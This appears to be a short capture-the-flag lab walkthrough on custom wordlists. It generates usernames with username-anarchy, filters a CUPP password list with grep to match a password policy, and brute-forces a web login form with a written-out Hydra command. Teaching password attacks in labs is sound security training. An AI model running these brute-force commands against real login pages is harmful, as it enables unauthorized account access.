Custom Wordlists
After successfully brute-forcing, and then logging into the target, what is the full flag you find?
Getting the flag:
Step 1 - Generate usernames:
./username-anarchy Jane Smith > jane_smith_usernames.txt
Step 2 - Use CUPP to create a personalized password list:
Step 3 - Filter the password to match the following policy:
Minimum Length: 6 characters
Must Include:
At least one uppercase letter
At least one lowercase letter
At least one number
At least two special characters (from the set
!@#$%^&*)
grep -E '^.{6,}$' jane.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' | grep -E '([!@#$%^&*].*){2,}' > jane-filtered.txt
Step 4 - Brute-force the login form with Hydra:
hydra -L jane_smith_usernames.txt -P jane-filtered.txt SERVER_IP -s SERVERPORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"
Step 5 - Login with the credentials and get the flag:
Last updated